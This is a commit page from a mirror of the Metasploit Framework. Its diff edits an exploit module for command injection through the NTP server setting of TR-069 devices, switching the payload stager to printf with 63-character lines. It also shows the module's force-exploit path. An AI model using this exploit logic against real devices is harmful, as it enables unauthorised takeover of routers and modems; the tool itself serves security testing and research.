infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Linemax 63, switch to printf

bug/bundler_fix
Tod Beardsley 2016-11-30 07:51:36 -06:00
parent 08b9684c1a
commit 657d52951b
No known key found for this signature in database
GPG Key ID: 08B5B91DC85943FE
1 changed files with 9 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
View File

@ -116,15 +116,22 @@ class MetasploitModule < Msf::Exploit::Remote
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
def inject_staged_data
execute_cmdstager(
flavor: :printf,
linemax: 63
)
end
def exploit def exploit
print_status("#{peer} - Checking...") print_status("#{peer} - Checking...")
if check == Exploit::CheckCode::Appears if check == Exploit::CheckCode::Appears
print_status("#{peer} - Appears vulnerable") print_status("#{peer} - Appears vulnerable")
execute_cmdstager({:flavor => :echo}) inject_staged_data
elsif datastore['FORCE_EXPLOIT'] elsif datastore['FORCE_EXPLOIT']
print_status("#{peer} - Doesn't appear vulnerable, but trying anyway.") print_status("#{peer} - Doesn't appear vulnerable, but trying anyway.")
execute_cmdstager({:flavor => :echo}) inject_staged_data
else else
fail_with(Failure::Unknown, "#{peer} - Failed to access the device") fail_with(Failure::Unknown, "#{peer} - Failed to access the device")
end end